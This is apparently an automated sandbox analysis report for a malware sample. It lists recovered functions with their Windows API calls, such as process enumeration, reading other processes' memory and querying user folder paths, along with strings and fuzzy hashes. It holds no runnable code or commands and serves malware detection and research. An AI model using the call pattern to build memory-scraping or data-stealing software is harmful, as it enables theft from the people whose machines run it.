Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: 9175a8f30122ff8e1dad19b6bde1a36ed791c65f8da6440ec40c85f90aa68263
Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
Opcode Fuzzy Hash: 9175a8f30122ff8e1dad19b6bde1a36ed791c65f8da6440ec40c85f90aa68263
Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9

Function 021BC347 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BC387

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction ID: 388ac7fb6dc9cab161d0db8a16e60ca40de341b2edea48aa20eceb9cdf6d1a81
Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction Fuzzy Hash: 66319E75E802459FDB21AFB4DC88AAEBBB6AF45309F144466E801E7260D734C941DFD4

Function 021BF077 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BF0A6
lstrlen.KERNEL32(00000000), ref: 021BF0B4
lstrcpy.KERNEL32(00000000,00000000), ref: 021BF0DB
lstrlen.KERNEL32(00000000), ref: 021BF0E2
lstrcpy.KERNEL32(00000000,00435550), ref: 021BF116

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction ID: 3db07e8e7c26a9d4b218faee22c678e1567e76c89390b1317e97bc01beda3f7f
Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction Fuzzy Hash: 8F318975B816955FC722BF38DC98E9E7BA6AF40308F044524FC05DBA21DB34D9069F94

Function 021C3C57 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

Part of subcall function 021C7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 021C7495

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 021C3C9D
Process32First.KERNEL32(00000000,00000128), ref: 021C3CB0
Process32Next.KERNEL32(00000000,00000128), ref: 021C3CC6

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

CloseHandle.KERNEL32(00000000), ref: 021C3DFE

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction ID: 328b3e4964c62143da8d7cdc297f23bc65d140968e83e3ca0e5cad95c7496eed
Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction Fuzzy Hash: 0181F574940214CFC715CF28D888BA5B7B2BB54329F69C1EDE4199B2E2D776D882CF90

Function 021BE8A7 Relevance: 6.2, APIs: 4, Instructions: 157stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 021BE8F2
lstrcpy.KERNEL32(00000000,?), ref: 021BE927
lstrcat.KERNEL32(?,00000000), ref: 021BE933
lstrcat.KERNEL32(?,00638B00), ref: 021BE94C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
Instruction ID: 3ba8562c80c704ccc7a506c00aeb5d89df92327d8c8115b2f156f3b478fafb0a
Opcode Fuzzy Hash: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
Instruction Fuzzy Hash: 71519779640204AFD354EF24DC55EEE7BAAEF88304F408519B99987290EF74E909CFD2

Function 021C2443 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 021C2469
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 021C2545
VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 021C25A7
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,021C2686), ref: 021C25B9

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: MemoryProcessRead$QueryVirtual
String ID:
API String ID: 268806267-0
Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction ID: 5f7a62c091afc73576febe499b1ce36a1b0a0a07125d2c537d4fd4fe78df44e6
Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction Fuzzy Hash: 7E419E75A402199BDB20CFA4D8A4BEFB7B6FB94724F248129ED15EB240D334D941CB90

Function 021A4BE7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 021A4C22
RtlAllocateHeap.NTDLL(00000000), ref: 021A4C29
strlen.MSVCRT ref: 021A4CB6
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 021A4D37

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2355128949-0
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 9ac339e95232a9a5511c0f32a2e18f89b2b9da6f27591febdc7d8d6bed3b72b6
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: 7531EB20F4833C7F86216BA56C45BDFBED4DF8E760F389053F50856188C9A46405CEE9

Function 021B8027 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 021B803F

Part of subcall function 021CA457: std::exception::exception.LIBCMT ref: 021CA46C
Part of subcall function 021CA457: __CxxThrowException@8.LIBCMT ref: 021CA481
Part of subcall function 021CA457: std::exception::exception.LIBCMT ref: 021CA492

std::_Xinvalid_argument.LIBCPMT ref: 021B805D
std::_Xinvalid_argument.LIBCPMT ref: 021B8078
memcpy.MSVCRT(?,?,?,00000000,?,?,021B7F61,00000000,?,?,00000000,?,021A941D,?), ref: 021B80DB

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
String ID:
API String ID: 285807467-0
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 08974b8b191054c998502252fc2705c30930d9f33994aeef1c11fcf5b3981896
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 4321A5313806008FD326DE6CD890B6AF7FAEF94B54F254B2EE5928B780D771D8418795

Function 021B8329 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 021B836C
lstrlen.KERNEL32(00000000), ref: 021B83B2
lstrcpy.KERNEL32(00000000,00000000), ref: 021B83E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 021B83F9
lstrlen.KERNEL32(00000000), ref: 021B8437
lstrcpy.KERNEL32(00000000,00000000), ref: 021B8466
strtok_s.MSVCRT ref: 021B8476

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction ID: 3470e6b5dc422a19c35e7e8825534ad354eb5afc296ed75e71a08c0150ab82f7
Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction Fuzzy Hash: D3210F759002059FC722CF68DC48BDABBB8EF00B14F158299EC599B291EB34DA02CB90

Function 021BEF37 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 021BEF7B
lstrcpy.KERNEL32(00000000,?), ref: 021BEFAA
lstrcat.KERNEL32(?,00000000), ref: 021BEFB8
lstrcat.KERNEL32(?,00638930), ref: 021BEFD3

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction ID: 82010ec2097086ddea048135c2bdcc58e526acf59e494357350dd89f5d6b1774
Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction Fuzzy Hash: 563160B5A41158AFCB20EF74DC54BED77B6AF48304F100469EA49D7290DB70AE449F94

Function 021BCBA7 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 021BCBCC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BCC09
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BCC38

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID:
API String ID: 2610293679-0
Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction ID: 5085748a269ea0c9051a217916d68fa6b467d5dfae91b9da822d693b979d1c55
Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction Fuzzy Hash: 2A219E75E402489FDB21EFB4DC84AEEBBB5EF08309F040466D805E7251D734DA469BA4

Function 021B8F67 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004353C8), ref: 021B8F81
ExitProcess.KERNEL32 ref: 021B8F8E
strtok_s.MSVCRT ref: 021B8FA0

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction ID: 82d20211d143dedefd4009caae9df7929afd68b206632081e062ee4d8d47d4c0
Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction Fuzzy Hash: B0015275A40209FBCB119FA4EC848DE77BEEF88314B018479F905D7200E7759A458BA5

Function 021C4707 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 021C4719
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 021C4734
CloseHandle.KERNEL32(00000000), ref: 021C473B
lstrcpy.KERNEL32(00000000,?), ref: 021C476E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
String ID:
API String ID: 4028989146-0
Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction ID: 0a12457dedf4bffce48dad93603a2b26b2c26f7ff916858853cb11d9e52c8bde
Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction Fuzzy Hash: ACF0F6B59457152FE721AB749C8CBEABBB9DF15704F1011A8FA45D7180DBF488848FE0

Function 004087B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040880C
memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

string too long, xrefs: 00408807

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: b947c0a78a397c0a6375e3dcb6b8a04b19f247f2e3f9c5f5cca1ad30c9f6fbf7
Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
Opcode Fuzzy Hash: b947c0a78a397c0a6375e3dcb6b8a04b19f247f2e3f9c5f5cca1ad30c9f6fbf7
Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D

Function 021A8AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 021A8B1A

Part of subcall function 021CA40A: std::exception::exception.LIBCMT ref: 021CA41F
Part of subcall function 021CA40A: __CxxThrowException@8.LIBCMT ref: 021CA434
Part of subcall function 021CA40A: std::exception::exception.LIBCMT ref: 021CA445

Strings

yxxx, xrefs: 021A8B24
yxxx, xrefs: 021A8B71

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: 2b368bb3f7b49ac60d325b9107e743a8703c81227107f6ddc5124761f39ebd07
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: D43189B5E005199FCB08DF58C8916AEBBB6EF88310F158269E915AF384D735E901CBD1

Function 00408A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408AA5

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,?,?), ref: 00408AEF

Strings

string too long, xrefs: 00408AA0

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
String ID: string too long
API String ID: 2475949303-2556327735
Opcode ID: ddf6d5514f6a3b388a40c29d000fc61756218ece0f845b9bb1d251710e50692b
Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
Opcode Fuzzy Hash: ddf6d5514f6a3b388a40c29d000fc61756218ece0f845b9bb1d251710e50692b
Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798

Function 021C5B97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 021C5BA9

Part of subcall function 021CA40A: std::exception::exception.LIBCMT ref: 021CA41F
Part of subcall function 021CA40A: __CxxThrowException@8.LIBCMT ref: 021CA434
Part of subcall function 021CA40A: std::exception::exception.LIBCMT ref: 021CA445

std::_Xinvalid_argument.LIBCPMT ref: 021C5BBC

Strings

Sec-WebSocket-Version: 13, xrefs: 021C5BAE

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: Sec-WebSocket-Version: 13
API String ID: 963545896-4220314181
Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction ID: e13a17b581383c6adf5554ee9485c96b7600866a152fb3f0f5de1ce2013f8905
Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction Fuzzy Hash: D51170783847449BC3368E2CE850B0ABBE7ABE1710FB50A6DE091A7784D761E8418795

Function 00408BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408BBF

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5

Strings

invalid string position, xrefs: 00408BBA

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 655285616-1799206989
Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398

Function 021BC3BF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 021C42B4
Part of subcall function 021C4287: lstrcpy.KERNEL32(00000000,?), ref: 021C42E9

Part of subcall function 021C7557: lstrcpy.KERNEL32(00000000), ref: 021C7586
Part of subcall function 021C7557: lstrcat.KERNEL32(00000000), ref: 021C7592

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5B2
lstrcat.KERNEL32(00000000), ref: 021BC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BC629

Memory Dump Source

